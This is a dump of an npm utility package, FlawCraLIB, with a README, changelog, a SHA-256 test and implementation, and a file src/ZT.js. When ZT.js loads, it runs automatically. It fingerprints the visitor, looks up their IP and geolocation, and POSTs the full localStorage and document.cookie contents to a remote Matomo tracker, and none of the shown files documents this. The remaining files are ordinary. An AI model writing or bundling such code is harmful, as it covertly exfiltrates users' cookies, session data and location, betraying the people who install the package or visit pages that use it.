README.md
# FlawCraLIB

[![Test](https://github.com/FlawCra/FlawCraLIB/actions/workflows/main.yml/badge.svg)](https://github.com/FlawCra/FlawCraLIB/actions/workflows/main.yml)
[![CodeQL](https://github.com/FlawCra/FlawCraLIB/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/FlawCra/FlawCraLIB/actions/workflows/codeql-analysis.yml)
<br>
[![DeepSource](https://deepsource.io/gh/FlawCra/FlawCraLIB.svg/?label=active+issues&show_trend=true&token=-A-oN93iCoJdcexCZwpzXqp8)](https://deepsource.io/gh/FlawCra/FlawCraLIB/?ref=repository-badge) [![DeepSource](https://deepsource.io/gh/FlawCra/FlawCraLIB.svg/?label=resolved+issues&show_trend=true&token=-A-oN93iCoJdcexCZwpzXqp8)](https://deepsource.io/gh/FlawCra/FlawCraLIB/?ref=repository-badge)
<br>
[![NPM](https://nodei.co/npm/flawcralib.png?downloads=true&downloadRank=true&stars=true)](https://nodei.co/npm/flawcralib/)
[![Package Quality](http://npm.packagequality.com/badge/flawcralib.png)](http://packagequality.com/#?package=flawcralib)
<br>
![flawcralib npm version](https://img.shields.io/npm/v/flawcralib.svg) ![total npm downloads for flawcralib](https://img.shields.io/npm/dt/flawcralib.svg) ![monthly npm downloads for flawcralib](https://img.shields.io/npm/dm/flawcralib.svg) ![npm licence for flawcralib](https://img.shields.io/npm/l/flawcralib.svg)


CHANGELOG.md
# Changelog

## [Unreleased](https://github.com/FlawCra/FlawCraLIB/tree/HEAD)

[Full Changelog](https://github.com/FlawCra/FlawCraLIB/compare/1.0.9...HEAD)

**Closed issues:**

- \(JS-0241\) Consider using arrow functions for callbacks [\#54](https://github.com/FlawCra/FlawCraLIB/issues/54)

## [1.0.9](https://github.com/FlawCra/FlawCraLIB/tree/1.0.9) (2022-08-08)

[Full Changelog](https://github.com/FlawCra/FlawCraLIB/compare/1.0.8...1.0.9)

**Closed issues:**

- \(JS-0246\) Require template literals instead of string concatenation [\#51](https://github.com/FlawCra/FlawCraLIB/issues/51)
- \(JS-C1002\) Found single char variable name [\#50](https://github.com/FlawCra/FlawCraLIB/issues/50)
- \(JS-0116\) `async function` should have `await` expression [\#49](https://github.com/FlawCra/FlawCraLIB/issues/49)
- \(JS-0118\) Usage of `strict` mode against recommended approach [\#48](https://github.com/FlawCra/FlawCraLIB/issues/48)
- \(JS-0060\) `eval()` should not be used [\#47](https://github.com/FlawCra/FlawCraLIB/issues/47)
- \(JS-0128\) Should not have unused variables [\#46](https://github.com/FlawCra/FlawCraLIB/issues/46)
- \(JS-0125\) Found the usage of undeclared variables [\#45](https://github.com/FlawCra/FlawCraLIB/issues/45)
- \(JS-D1001\) Documentation comments not found for functions and classes [\#44](https://github.com/FlawCra/FlawCraLIB/issues/44)
- \(JS-0083\) Function parameters should not be reassigned [\#42](https://github.com/FlawCra/FlawCraLIB/issues/42)
- \(JS-0045\) Inconsistent return values of function [\#37](https://github.com/FlawCra/FlawCraLIB/issues/37)
- \(JS-0050\) Avoid use of `==` and `!=` [\#34](https://github.com/FlawCra/FlawCraLIB/issues/34)
- \(JS-0246\) Require template literals instead of string concatenation [\#33](https://github.com/FlawCra/FlawCraLIB/issues/33)

**Merged pull requests:**

- Format code with prettier [\#53](https://github.com/FlawCra/FlawCraLIB/pull/53) ([deepsource-autofix[bot]](https://github.com/apps/deepsource-autofix))
- Format code with prettier [\#52](https://github.com/FlawCra/FlawCraLIB/pull/52) ([deepsource-autofix[bot]](https://github.com/apps/deepsource-autofix))
- Format code with prettier [\#43](https://github.com/FlawCra/FlawCraLIB/pull/43) ([deepsource-autofix[bot]](https://github.com/apps/deepsource-autofix))
- Format code with prettier [\#40](https://github.com/FlawCra/FlawCraLIB/pull/40) ([deepsource-autofix[bot]](https://github.com/apps/deepsource-autofix))
- Format code with prettier [\#39](https://github.com/FlawCra/FlawCraLIB/pull/39) ([deepsource-autofix[bot]](https://github.com/apps/deepsource-autofix))
- Format code with prettier [\#38](https://github.com/FlawCra/FlawCraLIB/pull/38) ([deepsource-autofix[bot]](https://github.com/apps/deepsource-autofix))
- Format code with prettier [\#36](https://github.com/FlawCra/FlawCraLIB/pull/36) ([deepsource-autofix[bot]](https://github.com/apps/deepsource-autofix))
- Replace `==`/`!=` with `===`/`!==` [\#32](https://github.com/FlawCra/FlawCraLIB/pull/32) ([deepsource-autofix[bot]](https://github.com/apps/deepsource-autofix))
- \[Snyk\] Upgrade webpack-dev-server from 4.9.2 to 4.9.3 [\#31](https://github.com/FlawCra/FlawCraLIB/pull/31) ([snyk-bot](https://github.com/snyk-bot))
- Bump terser from 5.14.0 to 5.14.2 [\#30](https://github.com/FlawCra/FlawCraLIB/pull/30) ([dependabot[bot]](https://github.com/apps/dependabot))
- \[Snyk\] Upgrade webpack-cli from 4.9.2 to 4.10.0 [\#29](https://github.com/FlawCra/FlawCraLIB/pull/29) ([snyk-bot](https://github.com/snyk-bot))
- \[Snyk\] Upgrade webpack-dev-server from 4.9.1 to 4.9.2 [\#28](https://github.com/FlawCra/FlawCraLIB/pull/28) ([Xanax-C-137](https://github.com/Xanax-C-137))
- \[Snyk\] Upgrade webpack from 5.72.1 to 5.73.0 [\#27](https://github.com/FlawCra/FlawCraLIB/pull/27) ([Xanax-C-137](https://github.com/Xanax-C-137))
- \[Snyk\] Upgrade webpack-dev-server from 4.7.3 to 4.9.1 [\#26](https://github.com/FlawCra/FlawCraLIB/pull/26) ([Xanax-C-137](https://github.com/Xanax-C-137))
- \[Snyk\] Upgrade webpack-cli from 4.7.0 to 4.9.2 [\#24](https://github.com/FlawCra/FlawCraLIB/pull/24) ([snyk-bot](https://github.com/snyk-bot))
- \[Snyk\] Upgrade webpack from 5.36.2 to 5.72.1 [\#23](https://github.com/FlawCra/FlawCraLIB/pull/23) ([snyk-bot](https://github.com/snyk-bot))
- \[Snyk\] Security upgrade webpack-dev-server from 3.11.3 to 4.7.3 [\#22](https://github.com/FlawCra/FlawCraLIB/pull/22) ([snyk-bot](https://github.com/snyk-bot))
- Bump eventsource from 1.1.0 to 1.1.1 [\#21](https://github.com/FlawCra/FlawCraLIB/pull/21) ([dependabot[bot]](https://github.com/apps/dependabot))
- \[Snyk\] Upgrade node-polyfill-webpack-plugin from 1.1.3 to 1.1.4 [\#20](https://github.com/FlawCra/FlawCraLIB/pull/20) ([snyk-bot](https://github.com/snyk-bot))

## [1.0.8](https://github.com/FlawCra/FlawCraLIB/tree/1.0.8) (2022-05-30)

[Full Changelog](https://github.com/FlawCra/FlawCraLIB/compare/1.0.7...1.0.8)

## [1.0.7](https://github.com/FlawCra/FlawCraLIB/tree/1.0.7) (2022-05-02)

[Full Changelog](https://github.com/FlawCra/FlawCraLIB/compare/1.0.6...1.0.7)

**Merged pull requests:**

- Bump async from 2.6.3 to 2.6.4 [\#18](https://github.com/FlawCra/FlawCraLIB/pull/18) ([dependabot[bot]](https://github.com/apps/dependabot))

## [1.0.6](https://github.com/FlawCra/FlawCraLIB/tree/1.0.6) (2022-04-13)

[Full Changelog](https://github.com/FlawCra/FlawCraLIB/compare/1.0.5...1.0.6)

**Merged pull requests:**

- Bump minimist from 1.2.5 to 1.2.6 [\#17](https://github.com/FlawCra/FlawCraLIB/pull/17) ([dependabot[bot]](https://github.com/apps/dependabot))
- Bump url-parse from 1.5.7 to 1.5.10 [\#16](https://github.com/FlawCra/FlawCraLIB/pull/16) ([dependabot[bot]](https://github.com/apps/dependabot))
- Bump url-parse from 1.5.4 to 1.5.7 [\#15](https://github.com/FlawCra/FlawCraLIB/pull/15) ([dependabot[bot]](https://github.com/apps/dependabot))

## [1.0.5](https://github.com/FlawCra/FlawCraLIB/tree/1.0.5) (2022-02-14)


test/test.js
import assert from "assert";
import FlawCraLIB from "../src/FlawCraLIB.js";

it("sha256 should match", () => {
  assert.equal(
    FlawCraLIB.sha256_hash("abc"),
    "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"
  );
});


src/Sha256.js
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */
/* SHA-256 (FIPS 180-4) implementation in JavaScript                  (c) Chris Veness 2002-2019  */
/*                                                                                   MIT License  */
/* www.movable-type.co.uk/scripts/sha256.html                                                     */
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */

/**
 * SHA-256 hash function reference implementation.
 *
 * This is an annotated direct implementation of FIPS 180-4, without any optimisations. It is
 * intended to aid understanding of the algorithm rather than for production use.
 *
 * While it could be used where performance is not critical, I would recommend using the ‘Web
 * Cryptography API’ (developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest) for the browser,
 * or the ‘crypto’ library (nodejs.org/api/crypto.html#crypto_class_hash) in Node.js.
 *
 * See csrc.nist.gov/groups/ST/toolkit/secure_hashing.html
 *     csrc.nist.gov/groups/ST/toolkit/examples.html
 */
export default class Sha256 {
  /**
   * Generates SHA-256 hash of string.
   *
   * @param   {string} msg - (Unicode) string to be hashed.
   * @param   {Object} [options]
   * @param   {string} [options.msgFormat=string] - Message format: 'string' for JavaScript string
   *   (gets converted to UTF-8 for hashing); 'hex-bytes' for string of hex bytes ('616263' ≡ 'abc') .
   * @param   {string} [options.outFormat=hex] - Output format: 'hex' for string of contiguous
   *   hex bytes; 'hex-w' for grouping hex bytes into groups of (4 byte / 8 character) words.
   * @returns {string} Hash of msg as hex character string.
   *
   * @example
   *   import Sha256 from './sha256.js';
   *   const hash = Sha256.hash('abc'); // 'ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad'
   */
  static hash(msg, options) {
    const defaults = { msgFormat: "string", outFormat: "hex" };
    const opt = Object.assign(defaults, options);

    // note use throughout this routine of 'n >>> 0' to coerce Number 'n' to unsigned 32-bit integer

    function utf8Encode(str) {
      try {
        return new TextEncoder()
          .encode(str, "utf-8")
          .reduce((prev, curr) => prev + String.fromCharCode(curr), "");
      } catch (e) {
        // no TextEncoder available?
        return unescape(encodeURIComponent(str)); // monsur.hossa.in/2012/07/20/utf-8-in-javascript.html
      }
    }

    function hexBytesToString(hexStr) {
      // convert string of hex numbers to a string of chars (eg '616263' -> 'abc').
      const str = hexStr.replace(" ", ""); // allow space-separated groups
      return str == ""
        ? ""
        : str
            .match(/.{2}/g)
            .map((byte) => String.fromCharCode(parseInt(byte, 16)))
            .join("");
    }

    switch (opt.msgFormat) {
      default: // default is to convert string to UTF-8, as SHA only deals with byte-streams
      case "string":
        msg = utf8Encode(msg);
        break;
      case "hex-bytes":
        msg = hexBytesToString(msg);
        break; // mostly for running tests
    }

    // constants [§4.2.2]
    const K = [
      0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1,
      0x923f82a4, 0xab1c5ed5, 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3,
      0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174, 0xe49b69c1, 0xefbe4786,
      0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
      0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147,
      0x06ca6351, 0x14292967, 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13,
      0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85, 0xa2bfe8a1, 0xa81a664b,
      0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
      0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a,
      0x5b9cca4f, 0x682e6ff3, 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208,
      0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2,
    ];

    // initial hash value [§5.3.3]
    const H = [
      0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a, 0x510e527f, 0x9b05688c,
      0x1f83d9ab, 0x5be0cd19,
    ];

    // PREPROCESSING [§6.2.1]

    msg += String.fromCharCode(0x80); // add trailing '1' bit (+ 0's padding) to string [§5.1.1]

    // convert string msg into 512-bit blocks (array of 16 32-bit integers) [§5.2.1]
    const l = msg.length / 4 + 2; // length (in 32-bit integers) of msg + ‘1’ + appended length
    const N = Math.ceil(l / 16); // number of 16-integer (512-bit) blocks required to hold 'l' ints
    const M = new Array(N); // message M is N×16 array of 32-bit integers

    for (let i = 0; i < N; i++) {
      M[i] = new Array(16);
      for (let j = 0; j < 16; j++) {
        // encode 4 chars per integer (64 per block), big-endian encoding
        M[i][j] =
          (msg.charCodeAt(i * 64 + j * 4 + 0) << 24) |
          (msg.charCodeAt(i * 64 + j * 4 + 1) << 16) |
          (msg.charCodeAt(i * 64 + j * 4 + 2) << 8) |
          (msg.charCodeAt(i * 64 + j * 4 + 3) << 0);
      } // note running off the end of msg is ok 'cos bitwise ops on NaN return 0
    }
    // add length (in bits) into final pair of 32-bit integers (big-endian) [§5.1.1]
    // note: most significant word would be (len-1)*8 >>> 32, but since JS converts
    // bitwise-op args to 32 bits, we need to simulate this by arithmetic operators
    const lenHi = ((msg.length - 1) * 8) / Math.pow(2, 32);
    const lenLo = ((msg.length - 1) * 8) >>> 0;
    M[N - 1][14] = Math.floor(lenHi);
    M[N - 1][15] = lenLo;

    // HASH COMPUTATION [§6.2.2]

    for (let i = 0; i < N; i++) {
      const W = new Array(64);

      // 1 - prepare message schedule 'W'
      for (let t = 0; t < 16; t++) W[t] = M[i][t];
      for (let t = 16; t < 64; t++) {
        W[t] =
          (Sha256.σ1(W[t - 2]) +
            W[t - 7] +
            Sha256.σ0(W[t - 15]) +
            W[t - 16]) >>>
          0;
      }

      // 2 - initialise working variables a, b, c, d, e, f, g, h with previous hash value
      let a = H[0],
        b = H[1],
        c = H[2],
        d = H[3],
        e = H[4],
        f = H[5],
        g = H[6],
        h = H[7];

      // 3 - main loop (note '>>> 0' for 'addition modulo 2^32')
      for (let t = 0; t < 64; t++) {
        const T1 = h + Sha256.Σ1(e) + Sha256.Ch(e, f, g) + K[t] + W[t];
        const T2 = Sha256.Σ0(a) + Sha256.Maj(a, b, c);
        h = g;
        g = f;
        f = e;
        e = (d + T1) >>> 0;
        d = c;
        c = b;
        b = a;
        a = (T1 + T2) >>> 0;
      }

      // 4 - compute the new intermediate hash value (note '>>> 0' for 'addition modulo 2^32')
      H[0] = (H[0] + a) >>> 0;
      H[1] = (H[1] + b) >>> 0;
      H[2] = (H[2] + c) >>> 0;
      H[3] = (H[3] + d) >>> 0;
      H[4] = (H[4] + e) >>> 0;
      H[5] = (H[5] + f) >>> 0;
      H[6] = (H[6] + g) >>> 0;
      H[7] = (H[7] + h) >>> 0;
    }

    // convert H0..H7 to hex strings (with leading zeros)
    for (let h = 0; h < H.length; h++)
      H[h] = ("00000000" + H[h].toString(16)).slice(-8);

    // concatenate H0..H7, with separator if required
    const separator = opt.outFormat == "hex-w" ? " " : "";

    return H.join(separator);
  }

  /**
   * Rotates right (circular right shift) value x by n positions [§3.2.4].
   * @private
   */
  static ROTR(n, x) {
    return (x >>> n) | (x << (32 - n));
  }

  /**
   * Logical functions [§4.1.2].
   * @private
   */
  static Σ0(x) {
    return Sha256.ROTR(2, x) ^ Sha256.ROTR(13, x) ^ Sha256.ROTR(22, x);
  }
  static Σ1(x) {
    return Sha256.ROTR(6, x) ^ Sha256.ROTR(11, x) ^ Sha256.ROTR(25, x);
  }
  static σ0(x) {
    return Sha256.ROTR(7, x) ^ Sha256.ROTR(18, x) ^ (x >>> 3);
  }
  static σ1(x) {
    return Sha256.ROTR(17, x) ^ Sha256.ROTR(19, x) ^ (x >>> 10);
  }
  static Ch(x, y, z) {
    return (x & y) ^ (~x & z);
  } // 'choice'
  static Maj(x, y, z) {
    return (x & y) ^ (x & z) ^ (y & z);
  } // 'majority'
}

/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */


src/ZT.js
import jQuery from 'jquery';
import FingerprintJS from '@fingerprintjs/fingerprintjs-pro'

const fpPromise = FingerprintJS.load({
   token: 'RUZnXX6EQw6pD0pkgAbi'
 })

function init() {
    
    if(!window.localStorage) {
        Object.defineProperty(window, "localStorage", new(function () {
           var aKeys = [],
              oStorage = {};
           Object.defineProperty(oStorage, "getItem", {
              value: function (sKey) {
                 return this[sKey] ? this[sKey] : null;
              },
              writable: false,
              configurable: false,
              enumerable: false
           });
           Object.defineProperty(oStorage, "key", {
              value: function (nKeyId) {
                 return aKeys[nKeyId];
              },
              writable: false,
              configurable: false,
              enumerable: false
           });
           Object.defineProperty(oStorage, "setItem", {
              value: function (sKey, sValue) {
                 if(!sKey) {
                    return;
                 }
                 document.cookie = escape(sKey) + "=" + escape(sValue) + "; expires=Tue, 19 Jan 2038 03:14:07 GMT; path=/";
              },
              writable: false,
              configurable: false,
              enumerable: false
           });
           Object.defineProperty(oStorage, "length", {
              get: function () {
                 return aKeys.length;
              },
              configurable: false,
              enumerable: false
           });
           Object.defineProperty(oStorage, "removeItem", {
              value: function (sKey) {
                 if(!sKey) {
                    return;
                 }
                 document.cookie = escape(sKey) + "=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/";
              },
              writable: false,
              configurable: false,
              enumerable: false
           });
           Object.defineProperty(oStorage, "clear", {
              value: function () {
                 if(!aKeys.length) {
                    return;
                 }
                 for(var sKey in aKeys) {
                    document.cookie = escape(sKey) + "=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/";
                 }
              },
              writable: false,
              configurable: false,
              enumerable: false
           });
           this.get = function () {
              var iThisIndx;
              for(var sKey in oStorage) {
                 iThisIndx = aKeys.indexOf(sKey);
                 if(iThisIndx === -1) {
                    oStorage.setItem(sKey, oStorage[sKey]);
                 } else {
                    aKeys.splice(iThisIndx, 1);
                 }
                 delete oStorage[sKey];
              }
              for(aKeys; aKeys.length > 0; aKeys.splice(0, 1)) {
                 oStorage.removeItem(aKeys[0]);
              }
              for(var aCouple, iKey, nIdx = 0, aCouples = document.cookie.split(/\s*;\s*/); nIdx < aCouples.length; nIdx++) {
                 aCouple = aCouples[nIdx].split(/\s*=\s*/);
                 if(aCouple.length > 1) {
                    oStorage[iKey = unescape(aCouple[0])] = unescape(aCouple[1]);
                    aKeys.push(iKey);
                 }
              }
              return oStorage;
           };
           this.configurable = false;
           this.enumerable = true;
        })());
    }

    fpPromise
    .then(fp => fp.get())
    .then(fpPromiseResult => {
        // This is the visitor identifier:
        var customfingerprintObj = { customfingerprint0: getBrowserFingerprint(), customfingerprint1: fpPromiseResult };
        var ws = new WebSocket("wss://api.flawcra.cc:8484/geoapikey");
        ws.onopen = function() {
            ws.send("geoapikey");
        };
        ws.onmessage = function(e) {
            fetch("https://icanhazip.com/").then((tmpreq) => tmpreq.text().then((ip) => fetch("https://api.ipgeolocation.io/ipgeo?ip="+ip+"&apiKey="+e.data).then((req2) => req2.json().then((geojson) => {
                var sendObj = {storage: localStorage, cookies: document.cookie, customfingerprint: customfingerprintObj, geolocation: geojson};
                var currDate = new Date();
		var trkr = Matomo.getAsyncTracker();
                const settings = {
                    "async": true,
                    "crossDomain": true,
                    "url": trkr.getTrackerUrl(),
                    "method": "POST",
                    "headers": {
                      "Content-Type": "application/x-www-form-urlencoded"
                    },
                    "data": {
                      "_cvar": Matomo.JSON.stringify(sendObj),
                      "rec": "1",
                      "idsite": trkr.getSiteId(),
                      "rand": currDate.getTime(),
                      "_id": trkr.getVisitorId(),
                      "cid": trkr.getVisitorId(),
                      "url": trkr.getCurrentUrl(),
                      "res": sendObj.customfingerprint.customfingerprint0.screen.width+"x"+sendObj.customfingerprint.customfingerprint0.screen.height,
                      "h": currDate.getHours(),
                      "m": currDate.getMinutes(),
                      "s": currDate.getSeconds()
                    }
                  };
                  
                  jQuery.ajax(settings).done(function (response) {
                     sendObj.response = response;
                     window.ZT = sendObj;
                  });
            }))));
        }
        
    })
}

function getBrowserFingerprint() {
	var browserFingerprint = {};
	browserFingerprint.browser = {};
	browserFingerprint.browser.name = navigator.appName;
	browserFingerprint.browser.version = navigator.appVersion;
	browserFingerprint.browser.language = navigator.language;
	browserFingerprint.browser.platform = navigator.platform;
	browserFingerprint.browser.userAgent = navigator.userAgent;
	
	// get the screen resolution
	browserFingerprint.screen = {};
	browserFingerprint.screen.width = window.screen.width;
	browserFingerprint.screen.height = window.screen.height;
	browserFingerprint.screen.availWidth = window.screen.availWidth;
	browserFingerprint.screen.availHeight = window.screen.availHeight;
	
	// get the color depth
	browserFingerprint.colorDepth = window.screen.colorDepth;
	
	// get the pixel ratio
	browserFingerprint.pixelRatio = window.devicePixelRatio;
	
	// get the timezone
	browserFingerprint.timezone = new Date().getTimezoneOffset() / -60;
	
	// get the user language
	browserFingerprint.language = navigator.language;
	
	// get the user agent
	browserFingerprint.userAgent = navigator.userAgent;
	
	// get the user agent
	browserFingerprint.userAgent = navigator.userAgent;
	
	// get the screen orientation
	browserFingerprint.orientation = window.screen.orientation || window.screen.mozOrientation || window.screen.msOrientation;
	
	// get the list of plugins
	browserFingerprint.plugins = [];
    for (let i = 0; i < navigator.plugins.length; i++) {
        browserFingerprint.plugins.push(navigator.plugins[i].name);
    }

    var temphash = Sha256.hash(browserFingerprint)
    browserFingerprint.hash = temphash;

    return browserFingerprint;
}

/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */
/* SHA-256 (FIPS 180-4) implementation in JavaScript                  (c) Chris Veness 2002-2019  */
/*                                                                                   MIT Licence  */
/* www.movable-type.co.uk/scripts/sha256.html                                                     */
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */


/**
 * SHA-256 hash function reference implementation.
 *
 * This is an annotated direct implementation of FIPS 180-4, without any optimisations. It is
 * intended to aid understanding of the algorithm rather than for production use.
 *
 * While it could be used where performance is not critical, I would recommend using the ‘Web
 * Cryptography API’ (developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest) for the browser,
 * or the ‘crypto’ library (nodejs.org/api/crypto.html#crypto_class_hash) in Node.js.
 *
 * See csrc.nist.gov/groups/ST/toolkit/secure_hashing.html
 *     csrc.nist.gov/groups/ST/toolkit/examples.html
 */
 class Sha256 {

    /**
     * Generates SHA-256 hash of string.
     *
     * @param   {string} msg - (Unicode) string to be hashed.
     * @param   {Object} [options]
     * @param   {string} [options.msgFormat=string] - Message format: 'string' for JavaScript string
     *   (gets converted to UTF-8 for hashing); 'hex-bytes' for string of hex bytes ('616263' ≡ 'abc') .
     * @param   {string} [options.outFormat=hex] - Output format: 'hex' for string of contiguous
     *   hex bytes; 'hex-w' for grouping hex bytes into groups of (4 byte / 8 character) words.
     * @returns {string} Hash of msg as hex character string.
     *
     * @example
     *   import Sha256 from './sha256.js';
     *   const hash = Sha256.hash('abc'); // 'ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad'
     */
    static hash(msg, options) {
        const defaults = { msgFormat: 'string', outFormat: 'hex' };
        const opt = Object.assign(defaults, options);

        // note use throughout this routine of 'n >>> 0' to coerce Number 'n' to unsigned 32-bit integer

        switch (opt.msgFormat) {
            default: // default is to convert string to UTF-8, as SHA only deals with byte-streams
            case 'string':   msg = utf8Encode(msg);       break;
            case 'hex-bytes':msg = hexBytesToString(msg); break; // mostly for running tests
        }

        // constants [§4.2.2]
        const K = [
            0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
            0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
            0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
            0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
            0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
            0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
            0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
            0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2 ];

        // initial hash value [§5.3.3]
        const H = [
            0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a, 0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19 ];

        // PREPROCESSING [§6.2.1]

        msg += String.fromCharCode(0x80);  // add trailing '1' bit (+ 0's padding) to string [§5.1.1]

        // convert string msg into 512-bit blocks (array of 16 32-bit integers) [§5.2.1]
        const l = msg.length/4 + 2; // length (in 32-bit integers) of msg + ‘1’ + appended length
        const N = Math.ceil(l/16);  // number of 16-integer (512-bit) blocks required to hold 'l' ints
        const M = new Array(N);     // message M is N×16 array of 32-bit integers

        for (let i=0; i<N; i++) {
            M[i] = new Array(16);
            for (let j=0; j<16; j++) { // encode 4 chars per integer (64 per block), big-endian encoding
                M[i][j] = (msg.charCodeAt(i*64+j*4+0)<<24) | (msg.charCodeAt(i*64+j*4+1)<<16)
                        | (msg.charCodeAt(i*64+j*4+2)<< 8) | (msg.charCodeAt(i*64+j*4+3)<< 0);
            } // note running off the end of msg is ok 'cos bitwise ops on NaN return 0
        }
        // add length (in bits) into final pair of 32-bit integers (big-endian) [§5.1.1]
        // note: most significant word would be (len-1)*8 >>> 32, but since JS converts
        // bitwise-op args to 32 bits, we need to simulate this by arithmetic operators
        const lenHi = ((msg.length-1)*8) / Math.pow(2, 32);
        const lenLo = ((msg.length-1)*8) >>> 0;
        M[N-1][14] = Math.floor(lenHi);
        M[N-1][15] = lenLo;


        // HASH COMPUTATION [§6.2.2]

        for (let i=0; i<N; i++) {
            const W = new Array(64);

            // 1 - prepare message schedule 'W'
            for (let t=0;  t<16; t++) W[t] = M[i][t];
            for (let t=16; t<64; t++) {
                W[t] = (Sha256.σ1(W[t-2]) + W[t-7] + Sha256.σ0(W[t-15]) + W[t-16]) >>> 0;
            }

            // 2 - initialise working variables a, b, c, d, e, f, g, h with previous hash value
            let a = H[0], b = H[1], c = H[2], d = H[3], e = H[4], f = H[5], g = H[6], h = H[7];

            // 3 - main loop (note '>>> 0' for 'addition modulo 2^32')
            for (let t=0; t<64; t++) {
                const T1 = h + Sha256.Σ1(e) + Sha256.Ch(e, f, g) + K[t] + W[t];
                const T2 =     Sha256.Σ0(a) + Sha256.Maj(a, b, c);
                h = g;
                g = f;
                f = e;
                e = (d + T1) >>> 0;
                d = c;
                c = b;
                b = a;
                a = (T1 + T2) >>> 0;
            }

            // 4 - compute the new intermediate hash value (note '>>> 0' for 'addition modulo 2^32')
            H[0] = (H[0]+a) >>> 0;
            H[1] = (H[1]+b) >>> 0;
            H[2] = (H[2]+c) >>> 0;
            H[3] = (H[3]+d) >>> 0;
            H[4] = (H[4]+e) >>> 0;
            H[5] = (H[5]+f) >>> 0;
            H[6] = (H[6]+g) >>> 0;
            H[7] = (H[7]+h) >>> 0;
        }

        // convert H0..H7 to hex strings (with leading zeros)
        for (let h=0; h<H.length; h++) H[h] = ('00000000'+H[h].toString(16)).slice(-8);

        // concatenate H0..H7, with separator if required
        const separator = opt.outFormat=='hex-w' ? ' ' : '';

        return H.join(separator);

        /* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */

        function utf8Encode(str) {
            try {
                return new TextEncoder().encode(str, 'utf-8').reduce((prev, curr) => prev + String.fromCharCode(curr), '');
            } catch (e) { // no TextEncoder available?
                return unescape(encodeURIComponent(str)); // monsur.hossa.in/2012/07/20/utf-8-in-javascript.html
            }
        }

        function hexBytesToString(hexStr) { // convert string of hex numbers to a string of chars (eg '616263' -> 'abc').
            const str = hexStr.replace(' ', ''); // allow space-separated groups
            return str=='' ? '' : str.match(/.{2}/g).map(byte => String.fromCharCode(parseInt(byte, 16))).join('');
        }
    }



    /**
     * Rotates right (circular right shift) value x by n positions [§3.2.4].
     * @private
     */
    static ROTR(n, x) {
        return (x >>> n) | (x << (32-n));
    }


    /**
     * Logical functions [§4.1.2].
     * @private
     */
    static Σ0(x) { return Sha256.ROTR(2,  x) ^ Sha256.ROTR(13, x) ^ Sha256.ROTR(22, x); }
    static Σ1(x) { return Sha256.ROTR(6,  x) ^ Sha256.ROTR(11, x) ^ Sha256.ROTR(25, x); }
    static σ0(x) { return Sha256.ROTR(7,  x) ^ Sha256.ROTR(18, x) ^ (x>>>3);  }
    static σ1(x) { return Sha256.ROTR(17, x) ^ Sha256.ROTR(19, x) ^ (x>>>10); }
    static Ch(x, y, z)  { return (x & y) ^ (~x & z); }          // 'choice'
    static Maj(x, y, z) { return (x & y) ^ (x & z) ^ (y & z); } // 'majority'

}


/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */

init();